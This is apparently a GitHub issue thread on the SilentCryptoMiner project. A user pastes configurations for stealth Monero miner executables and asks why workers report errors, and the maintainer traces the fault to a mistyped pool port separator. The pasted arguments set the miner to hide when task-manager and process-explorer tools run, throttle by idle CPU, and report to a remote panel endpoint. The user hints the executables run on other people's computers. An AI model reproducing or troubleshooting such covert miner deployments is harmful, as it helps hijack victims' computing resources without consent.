### ISSUE TITLE
error

### ISSUE THREAD

**Issue by floof989763** [UnamSanctam/SilentCryptoMiner#1345]
hello sir
i often make these exe files and i am doing it the same way.but i dont know why it is showing error on the panel in front of the name of workers
please help me out sir

**Comment by floof989763** [comment]
and it is not mining too

**Comment by floof989763** [comment]
Watchdog Running: Yes
Miners:
--algo=rx/0  --url=xmr-asia1.nanopool.org;14433 --user="45qwC12Ri68RYJnuoDSi7AY4HCdcuKPL21JBiCSWixsjCtnmWTgtr7Z3FZ7zSNxMNbZwLDBWVVmq9QL63iVk688BVcf7ykD.floof4" --pass="" --cpu-max-threads-hint=50 --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-api="http://gamingloadz.com/panel/api/endpoint.php" --cinit-version="3.1.0" --tls --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-id="towzjyzfykgtzyij"
GPUs:
 Intel(R) Iris(R) Xe Graphics
Compatible GPU found: False

my checker

**Comment by UnamSanctam** [comment]
You mean that the status is "Error"? Then it means that your miner (that computer) can't connect to the pool.

**Comment by floof989763** [comment]
why is that sir?
i have sent you checker i have entered the  monero pool

**Comment by UnamSanctam** [comment]
Either the computer can't reach it (ISP might be blocking it) or the pool has blocked it.

**Comment by floof989763** [comment]
what is isp sir

**Comment by UnamSanctam** [comment]
Your Internet Service Provider, either they could have blocked it or something similar.

**Comment by floof989763** [comment]
sir why is that
how can i correct it

**Comment by floof989763** [comment]
so if any anthor computer uses my exe will not face the problem

**Comment by floof989763** [comment]
sir i picked up and old exe i made and it is working properly
its checker
Watchdog Running: Yes
Miners:
--algo=rx/0  --url=xmr-asia1.nanopool.org:14433 --user="45qwC12Ri68RYJnuoDSi7AY4HCdcuKPL21JBiCSWixsjCtnmWTgtr7Z3FZ7zSNxMNbZwLDBWVVmq9QL63iVk688BVcf7ykD.worker1" --pass="" --cpu-max-threads-hint=50 --cinit-remote-config="" --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-api="http://gamingloadz.com/panel/api/endpoint.php" --cinit-version="3.1.0" --tls --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-id="eiwgcnsccohbwmdq"     
GPUs:
 Intel(R) Iris(R) Xe Graphics
Compatible GPU found: False

**Comment by UnamSanctam** [comment]
Oh, it's because you entered the pool address wrong, you entered `xmr-asia1.nanopool.org;14433`, which has a semi-colon `;` and not a colon `:` between the URL and port.

**Comment by floof989763** [comment]
ohhhhhhh
soo sorry sir 
i will check
